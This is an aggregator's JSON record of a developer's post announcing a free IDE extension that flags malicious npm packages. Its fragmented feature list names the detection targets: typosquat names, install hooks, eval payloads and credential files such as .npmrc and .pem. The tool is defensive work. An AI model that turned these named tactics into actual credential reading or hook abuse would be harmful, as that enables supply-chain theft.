{"slug": "i-built-a-free-ide-extension-to-catch-malicious-npm-packages-before-they-wreck", "title": "I built a free IDE extension to catch malicious npm packages before they wreck your project", "summary": "A developer built NPM Safety Guard, a free IDE extension that scans package.json and lockfiles for malicious npm packages across 22 detection layers. The tool catches typosquats, AI-hallucinated package names, suspicious scripts, and credential leaks without requiring a separate CLI step or account for core features.", "body_md": "Supply-chain attacks via npm are up year-over-year — packages like `event-stream`\n\n,\n\nthe Lazarus group drops, and AI-hallucinated typosquats keep landing in real codebases.\n\nI got tired of finding out *after* the fact, so I built **NPM Safety Guard**.\n\nIt scans your `package.json`\n\nand lockfiles right inside your editor — no separate CLI step.\n\nHere's what it currently catches across **22 detection layers**:\n\n`lodahs`\n\n, `reàct`\n\n, and AI-hallucinated package names`preinstall`\n\n/`postinstall`\n\nbefore you run them`eval`\n\n, and payload patterns in the actual source`.env`\n\n, `.npmrc`\n\n, `.pem`\n\nAll free. No account required for the core layers. MIT licensed on the VS Code side.\n\nThe VS Code extension is TypeScript. The JetBrains plugin is Kotlin. They share the same\n\ndetection signatures bundled at build time — no cloud dependency for the core scan.\n\nCVE lookups hit OSV.dev with a 24-hour local cache so you're not waiting on a network\n\ncall every keystroke.\n\nHave you been burned by a supply-chain attack before? Or do you have a detection layer\n\nyou wish existed? Drop it in the comments — I'm actively adding new signatures.", "url": "https://wpnews.pro/news/i-built-a-free-ide-extension-to-catch-malicious-npm-packages-before-they-wreck", "canonical_source": "https://dev.to/jomynn/i-built-a-free-ide-extension-to-catch-malicious-npm-packages-before-they-wreck-your-project-24oe", "published_at": "2026-06-18 10:16:30+00:00", "updated_at": "2026-06-18 10:21:12.811738+00:00", "lang": "en", "topics": ["developer-tools", "ai-safety", "ai-research"], "entities": ["NPM Safety Guard", "VS Code", "JetBrains", "OSV.dev", "npm", "event-stream", "Lazarus group"], "alternates": {"html": "https://wpnews.pro/news/i-built-a-free-ide-extension-to-catch-malicious-npm-packages-before-they-wreck", "markdown": "https://wpnews.pro/news/i-built-a-free-ide-extension-to-catch-malicious-npm-packages-before-they-wreck.md", "text": "https://wpnews.pro/news/i-built-a-free-ide-extension-to-catch-malicious-npm-packages-before-they-wreck.txt", "jsonld": "https://wpnews.pro/news/i-built-a-free-ide-extension-to-catch-malicious-npm-packages-before-they-wreck.jsonld"}}